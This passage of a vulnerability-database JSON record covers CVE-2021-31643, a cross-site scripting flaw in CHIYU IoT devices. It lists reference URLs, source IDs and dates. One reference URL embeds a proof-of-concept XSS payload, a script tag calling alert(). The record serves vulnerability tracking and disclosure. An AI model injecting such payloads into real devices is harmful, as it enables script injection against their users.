"url": "http://192.168.187.12/ap_tcps.htm"
},
{
"trust": 0.1,
"url": "http://192.168.187.12/manage.htm"
},
{
"trust": 0.1,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31250"
},
{
"trust": 0.1,
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks"
},
{
"trust": 0.1,
"url": "http://ip/\u003cscript\u003ealert(123)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31641"
},
{
"trust": 0.1,
"url": "https://www.chiyu-tech.com/category-hardware.html"
},
{
"trust": 0.1,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250"
},
{
"trust": 0.1,
"url": "https://www.chiyu-tech.com/msg/msg88.html"
},
{
"trust": 0.1,
"url": "http://192.168.187.12/wan_dc.htm"
},
{
"trust": 0.1,
"url": "http://192.168.187.143/wan_pe.htm"
},
{
"trust": 0.1,
"url": "http://127.0.0.1/emprcd.htm"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"date": "2021-06-01T15:08:26",
"db": "PACKETSTORM",
"id": "162887"
},
{
"date": "2021-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"date": "2021-06-01T15:15:07.747000",
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-14T09:15:00",
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"date": "2021-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"date": "2021-06-08T20:33:15.690000",
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0CHIYU\u00a0Technology\u00a0 Made \u00a0IoT\u00a0 Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
],
"trust": 0.7
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.